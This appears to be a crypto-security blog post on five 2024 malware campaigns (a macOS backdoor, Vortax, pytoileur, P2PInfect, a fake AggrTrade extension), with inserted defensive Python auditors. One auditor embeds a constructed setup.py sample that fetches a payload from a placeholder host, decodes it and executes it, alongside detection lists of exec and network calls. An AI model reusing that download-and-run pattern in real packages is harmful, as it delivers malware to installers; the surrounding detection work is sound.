5 New Malware Techniques to Steal Your Crypto (2024)

by Emily Green
October 24, 2024
in Security & Scams


Cybercriminals never stop innovating, and they are particularly attracted to cryptocurrencies. Maybe you’re on your merry way exploring the internet without knowing how many landmines you’re going to step on. It never hurts to be cautious and stay on top of the latest security trends when it comes to protecting your crypto funds.

To give you an idea of how big this illicit business is, according to Chainalysis about $24.2 billion was received by illicit crypto addresses in 2023. Don’t be part of the next number! Let’s take a look at some new malware techniques to be aware of this year and how you can protect yourself against them.

A backdoor in MacOS

It’s not exactly a good idea to download apps from unofficial sites, and this is a good example of why. Earlier this year, cybersecurity firm Kaspersky Lab discovered a new threat targeting macOS users’ cryptocurrency wallets, which was hidden in pirated software available on torrent and pirate websites.

When users install these seemingly free programs, they unknowingly allow malware onto their computers. The initial step involves an application called “Activator”, which asks users to provide administrative access. This gives the malware the necessary permissions to install itself and disable the normal function of the pirated software, tricking users into thinking they need this Activator to run the software.

Activator application in the backdoor malware. Image by Kaspersky

Once installed, the malware contacts a remote server to download further malicious instructions. These instructions help the malware create a backdoor, giving hackers continuous access to the infected computer. The main purpose of this malware is to steal cryptocurrency. It replaces legitimate wallet apps like Exodus and Bitcoin-Qt with infected versions.

These altered apps then capture sensitive information, such as recovery phrases and wallet passwords, and send it to the hackers – effectively draining your crypto funds. A suspicious “Activator” installer appeared right after you got a ‘free’ app? Do not give it access, and remove it immediately!

Vortax, Web3 Games and “Markopolo”

The Vortax campaign is a malware operation targeting cryptocurrency users, discovered by Recorded Future’s researchers. The cybercriminals behind this scheme use fake but legitimate-looking applications to infect both Windows and macOS devices with information-stealing malware. Posing as virtual meeting software called Vortax, the app looks credible: it has a website indexed by search engines, a blog with AI-generated articles and social media accounts on platforms like X, Telegram and Discord. The threat actor engages potential victims in cryptocurrency-themed discussions and urges them to download the Vortax app under the guise of joining a virtual meeting.

Once users follow the instructions provided, they are redirected to download links that install the Vortax software. However, instead of a functional application, the installation files deliver malware such as Rhadamanthys, Stealc or Atomic Stealer (AMOS). The Vortax application appears to be non-functional due to deliberate errors, while in the background the malware begins to steal sensitive information—including passwords and seed phrases. Further investigation revealed that the Vortax campaign was linked to several domains hosting similar malicious applications and fake web3 games, suggesting a well-organized effort by the threat actor identified as Markopolo.

Markopolo’s tactics include using social media and messaging platforms to spread the malware, which also masquerades as brands and games such as VDeck, Mindspeak, ArgonGame, DustFighter, and Astration. This strategy not only widens their reach, but also increases the likelihood that users will be tricked into downloading the malicious software. The campaign’s sophistication and adaptability suggest that future attacks could become even more common, highlighting the need for users to exercise caution when downloading third-party software, especially when someone is pressing them to install it.

Pytoileur, a trap for Python developers

Sonatype researchers have uncovered a new threat targeting cryptocurrency users through a malicious Python package called “pytoileur.” Disguised as a legitimate API management tool, pytoileur tricks users into downloading it from the Python Package Index (PyPI). Once installed, the package secretly retrieves and installs malicious software designed to steal cryptocurrencies by accessing sensitive information stored on the victim’s device.

The malicious package was cleverly hidden within seemingly innocent code. It downloaded a dangerous executable file that, once executed, performed various malicious activities. These include modifying system settings, maintaining a presence on the device to avoid detection, and, most importantly, attempting to steal cryptocurrency from wallets and accounts associated with popular services such as Binance, Coinbase, and Crypto.com. By accessing browser data and other financial details, the malware can harvest digital assets without the victim’s knowledge.

Pytoileur malicious package found by Sonatype

The spread of pytoileur involved social engineering tactics, including exploiting community platforms such as Stack Overflow to entice developers to download the package under the guise of solving technical problems. This incident is part of a broader “Cool package” campaign, which marks an ongoing effort by cybercriminals to target cryptocurrency users through sophisticated and evolving methods. Mend.io, another security firm, has identified more than 100 malicious packages on PyPI.

Developers can avoid malicious packages by downloading from trusted sources, verifying package integrity, and reviewing the code before use. Keeping up to date with security advice and using automated security tools also helps.
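
A check a developer can run on a package’s setup.py before installing it, as an added example that is not from the article or from Sonatype: it parses the install script with Python’s ast module and flags the download-then-execute pattern the article attributes to pytoileur. The two setup.py samples are constructed stand-ins, not the real package’s code.

```python
import ast

# Call names that match the behaviour the article describes for an install
# script: fetch something from the network, decode it, run it.
SUSPICIOUS = {
    "network": {"urlopen", "urlretrieve", "requests.get", "requests.post"},
    "exec": {"exec", "eval", "os.system", "os.popen", "os.startfile",
             "subprocess.Popen", "subprocess.run", "subprocess.call"},
    "decode": {"b64decode", "b32decode", "unhexlify", "zlib.decompress"},
}


def _dotted(node: ast.AST) -> str:
    """Turn the callee of a Call into 'pkg.mod.func' ('' if not a plain name)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _classify(dotted: str) -> list:
    """Match on the bare function name or on its 'module.func' tail."""
    tail = dotted.rsplit(".", 1)[-1]
    last_two = ".".join(dotted.split(".")[-2:])
    return [cat for cat, names in SUSPICIOUS.items()
            if tail in names or last_two in names]


def audit_setup_py(source: str) -> dict:
    """Parse setup.py source and score the fetch-and-execute pattern."""
    found = {"network": set(), "exec": set(), "decode": set()}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            for category in _classify(name):
                found[category].add(name)
    score = sum(1 for hits in found.values() if hits)
    if found["network"] and found["exec"]:
        score += 2  # downloading AND running code at install time is the red flag
    return {"score": score, "suspicious": score >= 3,
            **{k: sorted(v) for k, v in found.items()}}


# Constructed samples for the demonstration (not the real pytoileur code).
BENIGN_SETUP = """
from setuptools import setup, find_packages
setup(name="demo-api-tool", version="1.0", packages=find_packages())
"""

SUSPICIOUS_SETUP = """
from setuptools import setup
import base64, subprocess, urllib.request
blob = urllib.request.urlopen("http://example.invalid/p").read()
open("runtime.exe", "wb").write(base64.b64decode(blob))
subprocess.Popen(["runtime.exe"])
setup(name="demo-api-tool", version="1.0")
"""
```

Run `audit_setup_py(open("setup.py").read())` on an unpacked sdist before `pip install`; a hit is a reason to read the script, not proof of malice, since legitimate build scripts occasionally shell out.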

P2PInfect, a teeming threat

Identified by Cado Security, P2PInfect is a sophisticated malware family that uses a peer-to-peer botnet for command and control. In other words, infected machines communicate with and control one another directly, without relying on a central server. The updated version initially appeared dormant, but now includes ransomware and crypto-mining capabilities.

It spreads primarily by exploiting vulnerabilities in Redis, a popular in-memory database, which let the malware execute arbitrary commands and propagate itself across connected systems. The botnet function ensures that updates are distributed quickly and keeps an extensive network of compromised devices under control, for example across an entire company.

Victims typically encounter P2PInfect through insecure Redis configurations or through a limited number of SSH (Secure Shell) login attempts against remote systems using common credentials. Once active on a victim’s system, P2PInfect installs a crypto miner that targets the Monero cryptocurrency. The miner activates after a short delay and mines using the system’s resources, secretly sending the earnings to the attacker’s wallet and degrading the device’s performance.

Ransomware note in P2PInfect. Image by Cado Security

The ransomware component encrypts (locks) files and demands a crypto payment to get them back, although its effectiveness is limited by the typical permissions of infected Redis servers. The attacker’s Monero wallet accumulated about 71 XMR, equivalent to about $12,400. This illustrates the financial success of the campaign despite the potentially limited impact of the ransomware, given the typically low-value data stored in Redis. To avoid this malware, secure your Redis configurations and monitor regularly for unusual activity.
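
A way to check the Redis configuration the article says to secure, as an added example that is not from the article or from Cado Security: it parses a redis.conf and reports the settings that leave an instance reachable and writable by anyone, with a constructed weak config beside a hardened one. The directive names are real Redis directives; the password and both sample files are placeholders.

```python
# Commands that turn a writable Redis into code execution on the host; on a
# hardened server they are disabled (renamed to "") or restricted with ACLs.
ADMIN_COMMANDS = ("CONFIG", "DEBUG", "MODULE", "SLAVEOF", "REPLICAOF")
ALL_INTERFACES = {"0.0.0.0", "*", "::", "::*"}


def parse_redis_conf(text: str) -> dict:
    """Map directive -> value; 'bind' and 'rename-command' may repeat, so they keep a list."""
    conf = {"bind": [], "rename-command": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key in ("bind", "rename-command"):
            conf[key].append(value.strip())
        else:
            conf[key] = value.strip()
    return conf


def audit_redis_conf(text: str) -> list:
    """Return human-readable findings; an empty list means nothing exposed was found."""
    conf = parse_redis_conf(text)
    findings = []
    # A leading '-' marks an optional bind address in Redis; strip it before comparing.
    addresses = [a.lstrip("-") for a in " ".join(conf["bind"]).split()]
    if not addresses or any(a in ALL_INTERFACES for a in addresses):
        findings.append("bind: listens on every interface; bind to 127.0.0.1 or an internal address")
    if conf.get("protected-mode", "yes").lower() != "yes":  # default is yes since Redis 3.2
        findings.append("protected-mode no: remote clients are accepted without a password")
    if not conf.get("requirepass") and "user" not in conf:
        findings.append("no requirepass or ACL users: anyone who reaches the port can run commands")
    renamed = {entry.split()[0].upper() for entry in conf["rename-command"] if entry}
    exposed = [c for c in ADMIN_COMMANDS if c not in renamed]
    if exposed:
        findings.append("admin commands still reachable: " + ", ".join(exposed))
    return findings


# Constructed sample: the kind of exposed instance the article describes.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed sample: local only, authenticated, admin commands disabled.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
"""
```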

Fake AggrTrade, and other malicious extensions

The fake AggrTrade Chrome extension, described by security firm SlowMist, was a malicious tool that tricked users into losing significant amounts of cryptocurrency. The extension posed as a legitimate trading tool (AggrTrade) but was designed only to steal funds. Users unknowingly installed it, and it then exploited their access to cryptocurrency exchanges and trading platforms by capturing sensitive information such as passwords and credentials.

The extension functioned by capturing cookies and other session data, which allowed it to impersonate users’ logins and perform unauthorized transactions. This led to the theft of about $1 million in total. It was spread through deceptive tactics via social media and marketing promotion that lured victims into downloading and installing it, often from unofficial or suspicious sources.

Fake AggrTrade extension, before it was deleted. Image by SlowMist

This particular threat has already been taken down, but it is only one example among many. Several other malicious Chrome extensions currently masquerade as genuine trading services with the aim of stealing crypto. To protect yourself, only install extensions from trusted sources, regularly check their permissions, and monitor your accounts for unusual activity.

Also remember that all browser extensions are capable of tracking your entire browsing history, seeing what you do on every website, and stealing cookies and other private data. If you use hardware or paper wallets for significant amounts and keep security software updated, you can also improve your protection against such threats.
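
A way to “regularly check permissions” before trusting a trading extension, as an added example that is not from the article or from SlowMist: it reads an extension’s manifest.json and flags the cookies-plus-every-site combination that makes the session theft described above possible, handling both manifest v2 and v3 layouts. The three manifests are constructed samples.

```python
import json

# Host patterns that put the extension on every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that expose logged-in sessions rather than just the page on screen.
SESSION_PERMS = {"cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest"}


def audit_manifest(manifest_json: str) -> dict:
    """Flag the cookie-plus-every-site combination that enables session hijacking."""
    m = json.loads(manifest_json)
    version = int(m.get("manifest_version", 2))
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    hosts = set(m.get("host_permissions", []))          # MV3 lists hosts separately
    if version < 3:                                     # MV2 mixes host patterns into permissions
        hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    for script in m.get("content_scripts", []):         # injected scripts need host matches too
        hosts |= set(script.get("matches", []))
    broad = bool(hosts & BROAD_HOSTS)
    session = perms & SESSION_PERMS
    findings = []
    if broad:
        findings.append("host access to every website")
    if broad and "cookies" in session:
        findings.append("cookies on every site: can copy exchange session cookies and replay logins")
    if broad and session - {"cookies"}:
        findings.append("can observe or rewrite every request, including logins and API calls")
    return {"manifest_version": version, "broad_hosts": broad,
            "session_permissions": sorted(session),
            "findings": findings, "high_risk": broad and bool(session)}


# Constructed manifests for the demonstration (not the real AggrTrade extension).
RISKY_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Trade Helper", "version": "1.0",
    "permissions": ["cookies", "webRequest", "storage"],
    "host_permissions": ["<all_urls>"],
})
MINIMAL_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Price Ticker", "version": "1.0",
    "permissions": ["storage", "activeTab"],
    "host_permissions": ["https://api.example.invalid/*"],
})
LEGACY_MANIFEST = json.dumps({
    "manifest_version": 2, "name": "Old Helper", "version": "0.9",
    "permissions": ["cookies", "*://*/*"],
})
```

On Chrome the manifest of an installed extension sits in the profile’s Extensions folder; a price ticker that needs cookies on every site has no honest reason for it.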

Protective measures

To protect against crypto-stealing malware like this, you can apply some basic measures:

  • Install from trusted sources: only use extensions and software from trusted sources and official websites. Verify reviews and permissions before installation.
  • Install as little software as possible: before installing another application or browser extension on your computer, think again about whether you really need it. Maybe you can achieve your goals with the existing software? (However, it is safer on mobile platforms, where every app runs in a sandbox.)
  • Regular security checks: regularly review and remove unused extensions or software. Regularly check for unusual activity in your crypto accounts (online and offline) and on your system.
  • Use strong authentication: enable two-factor authentication (2FA) on your accounts to add an extra layer of security. In Obyte wallets, you can do this by creating a multi-device account from the main menu or by setting a spending password in settings.
  • Use anti-malware tools: use up-to-date antivirus and anti-malware tools to detect and block online and offline threats.
  • Secure your crypto: store significant crypto assets in hardware or paper wallets to reduce exposure to online threats. The Obyte wallet lets you easily create your own paper wallet by generating a textcoin (twelve random words), writing it down, and then deleting or locking the software itself until you need to spend the funds.

Inside Obyte and beyond, be sure to use secure and verified wallets and follow these best practices to protect your assets!

Featured vector image by Freepik


Emily Green

Protecting your crypto journey is Emily's mission. Her knowledge of cybersecurity threats and common scams empowers you with safe practices and secure storage solutions.

Copyright © 2024 UnCirculars
